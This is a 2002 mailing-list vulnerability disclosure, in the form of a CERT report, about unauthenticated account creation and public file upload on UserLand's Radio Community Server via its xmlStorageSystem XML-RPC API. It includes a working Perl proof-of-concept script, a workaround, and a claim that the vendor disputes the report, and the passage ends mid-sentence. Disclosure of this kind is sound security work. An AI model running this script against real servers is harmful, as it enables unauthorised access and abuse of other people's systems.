RCS public file sharing vulnerability

From: Gerhard Poul (gpoul@EUNET.AT)
Date: 07/07/02

Date:         Sun, 7 Jul 2002 17:34:36 +0200
From: Gerhard Poul <gpoul@EUNET.AT>


This is a vulnerability Andreas and I found about eight weeks ago. This
was then first reported to the vendor and CERT. CERT received it on
5/10/02 at 8:01pm. They haven't yet done anything with it as far as I
can tell. - I haven't received anything from them except for the
automated responses.

I've attached the same description here that I also sent to CERT.
Best regards,
Gerhard Poul


 Name : Gerhard Poul, Andreas Bolka
 E-mail : gpoul at eunet.at, andreas.bolka at gmx.net
 Phone / fax : [removed]
 Affiliation and address:

Have you reported this to the vendor? [yes/no] yes.

        If so, please let us know whom you've contacted:

        Date of your report : 5/9/02
        Vendor contact name : Dave Winer
        Vendor contact phone :
        Vendor contact e-mail : dave@userland.com
        Vendor reference number :


        ___ Do not release my identity to your vendor contact.

If there is a CERT Vulnerability tracking number please put it here
(otherwise leave blank): VU#______.

Please describe the vulnerability.

This vulnerability makes it possible for an intruder to use the open
SOAP or XML-RPC APIs published at
http://www.soapware.org/xmlStorageSystem to create user accounts and
upload random file data to any server running the Radio Community Server
as published by UserLand Software Inc. at http://rcs.userland.com

What is the impact of this vulnerability?

   a) What is the specific impact:

Intruders can publish public files on a server without any special user
permission over a network. - You don't need a user account or anything
else on the target machine to make this work.

   b) How would you envision it being used in an attack scenario:

This vulnerability enables attackers to publicly post files on any
machine running the vulnerable software package.

To your knowledge is the vulnerability currently being exploited?
        [yes/no] no.

If there is an exploitation script available, please include it here.


#!/usr/bin/perl
use strict;
use warnings;
use Frontier::Client;
use MIME::Base64 qw(encode_base64);

local $/ = undef;    # slurp: read the whole file named on the command line at once

my $email    = "John@test.com";
my $name     = "John Doe";
my $password = "whateveryouwant.com";
my $filename = $ARGV[0];

# XML-RPC endpoint of the Radio Community Server
my $server = Frontier::Client->new( 'url'   => 'http://radiohost/RPC2',
                                    'debug' => 0 );

# File contents, base64-encoded and wrapped as an XML-RPC <base64> value
my $file = $server->base64( encode_base64(<>) );

# Register a new user; no existing account or credentials on the server are needed
my $result = $server->call( "xmlStorageSystem.registerUser",
                            $email, $name, $password, 81, 0, 0 );
my $usernum = $result->{'usernum'};

# Upload the file under the freshly created account
$result = $server->call( "xmlStorageSystem.saveMultipleFiles",
                         $usernum, $password, [ $filename ], [ $file ] );
$filename = $result->{'urlList'}->[0];

print "New user with ID $usernum has been created\n";
print "File has been uploaded to URI: $filename\n";

Do you know what systems and/or configurations are vulnerable?
        [yes/no] no.

        System :
        OS version :

Are you aware of any workarounds and/or fixes for this vulnerability?
        [yes/no] yes.

There is a setting in the RCS software that restricts remote new user
registrations. - By turning these remote registrations off, which are on
by default, you can work around this problem but it will also restrict
the usefulness of the community server.


This vulnerability is an inherent design flaw of the xmlStorageSystem
XML-RPC or SOAP interface used between a Radio Client and a Radio
Community Server. - It has to be fixed in the specification first to
design a secure solution and every customer should be advised to
shut down their Radio Community Servers immediately.

The vendor has been contacted but does not agree with our vulnerability
